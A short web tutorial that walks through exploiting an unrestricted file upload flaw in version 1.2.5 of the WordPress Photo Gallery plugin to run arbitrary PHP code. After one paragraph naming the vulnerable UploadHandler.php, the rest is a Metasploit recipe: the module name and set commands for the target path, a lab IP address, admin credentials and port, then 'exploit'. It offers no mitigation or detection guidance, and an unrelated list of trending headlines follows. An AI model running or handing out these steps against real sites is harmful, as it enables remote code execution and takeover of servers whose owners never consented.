Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload

Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php. The post () method in UploadHandler.php does not properly verify or sanitize user-uploaded files.

Exploit Targets

Photo Gallery Plugin, version 1.2.5.

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi wordpress

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rport 80

msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit

Exploit Remote PC using WordPress Photo Gallery Unrestricted File Upload

Trending Articles

Detroit Mafia Consigliere’s Son Sunk The Zerilli-Tocco Crime Family In 1990s,...

Facebook hate campaign ends in jail for Christopher Chynoweth,...

Sentinel LDK Protection System - Internal Error 0x7101 occured

Suits Saison 1 VOSTFR [12/12] [MEGAUPLOAD]

Hardened UNC Path GPO Question

#TBT: Czar “Mercy Loko” Feat Richie Rich & Tinny

KIRSTEN VACHON Arrested by Oswego County Sheriff's Office on Dec 20, 2016

Sixth man charged in Kadooment Day shooting incident